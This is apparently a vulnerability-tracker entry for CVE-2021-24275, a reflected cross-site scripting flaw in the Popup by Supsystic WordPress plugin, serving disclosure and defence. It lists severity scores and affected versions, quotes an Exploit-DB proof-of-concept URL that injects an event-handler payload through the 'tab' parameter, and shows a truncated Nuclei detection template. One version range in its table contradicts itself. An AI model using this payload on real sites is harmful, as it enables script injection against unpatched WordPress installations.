CVE-2021-24275
Published: 2021-05-05
Priority: P3 · 46 · medium · CVSS 3.1 base score 6.1
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Exploit: public exploit available
EPSS: 18.16% (96.8th percentile)
The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| supsystic | popup | < 1.10.5 | 1.10.5 |
| supsystic | popup_by_supsystic | >= 1.10.5 < 1.10.5 | 1.10.5 |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| NVD | 2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |
No detection rules found.
Exploit-DB
WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS) [MEDIUM]
exploitdb · 2021-09-28 · CVSS 6.1
---
# Exploit Title: WordPress Plugin Popup 1.10.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/popup-by-supsystic/
# Version: 1.10.4
# Tested on: Windows 10
# CVE: CVE-2021-24275
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Nuclei
Popup by Supsystic <1.10.5 - Cross-Site scripting [MEDIUM]
nuclei · CVSS 6.1
Popup by Supsystic alert(document.domain)'
```yaml
        condition: and
      - type: word
        part: header
        words:
          - "text/html"
      - type: status
        status:
          - 200
# digest: 490a00463044022036ce636eec23560621a53603c4ee239e50877a036644442cd17c302c4f8d03e9022016058688f8ac1496dce4a4f815a29b6829484e6605d46231187ac14744bed346:922c64590222798bb761d5b6d8e72950
```
References:
- http://packetstormsecurity.com/files/164311/WordPress-Popup-1.10.4-Cross-Site-Scripting.html
- https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f